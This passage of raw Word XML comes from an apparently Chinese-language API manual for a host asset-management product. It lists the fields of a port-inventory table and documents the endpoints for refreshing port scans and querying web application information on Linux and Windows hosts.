          <w:p w14:paraId="78184BC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="30E0A3F3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60E62E9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79976013" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F4DC2B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25330201" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6ADAE814" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34FE74F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>proto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20DA4A2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="715C7264" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="029D6290" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="70C3115D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B064931" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B32CC5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16D71DD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="559FDBE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="60BB1037" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="067E19B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EAC6D59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27EBC534" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AF91583" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7B1D7516" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0369EEB8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>processName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11F7A911" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="651DA8B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DDDA55B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3995525C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3421D5D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bindIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11145A1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54D1E44C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="133028AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>绑定ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5991DC5B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30856146" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07F189B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="583C9EF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28AB9578" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口状态：-1 - 端口状态未知；0 – 仅内网可访问；1 - 外网可访问,null不存在该字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BBF7F00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="端口信息扫描"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:t>端口信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C780B14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求端口信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DBD34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656063E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/port/{win|linux}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE5AA66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC6F335" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216CFE2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5F56CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/port/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9172CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE0035" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788AD415" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F719E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A85DC0"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7066EA3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0214B25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="084C98DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D90D38C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38109D14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="15BDF661" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37336984" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A63AF6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D4D53C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A937360" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33A1AC2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="端口信息查询扫描状态"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r>
        <w:t>端口信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C56F205" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询系统端口信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8F8216" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="web应用信息"/>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:t>Web应用信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327E386C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询主机上web应用信息；每条数据均包含主机信息，您可以灵活的使用该接口组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F474414" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0B799F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的web应用信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F45B81B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B4BA7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>web应用信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6063A068" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690DA2CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2B7753" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8D97B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>web应用信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C02759E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>web应用信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2566E6F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>web应用信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B79740" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59326650" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>直接查询当前信息则直接调用web应用信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8BF2D6"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7CEFEB88" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2BC0E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="web应用信息查询结果"/>
      <w:r>
        <w:t>web应用信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789471E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询web应用信息，按每台主机每个用户组进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E27ACA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188D8980" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/webapp/{linux|win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E0BF8E"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520"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="3746"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4AE7DBC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1216C13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A3BE54C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16D890FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D3F27D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="53811F64" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BE6A952" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AFA94B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A272557" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AD048AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="20E8E6A6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B9E13A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A63A1DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B4572B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="324F2270" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="449E914E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21E53E7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="729AB5CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="343D2708" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
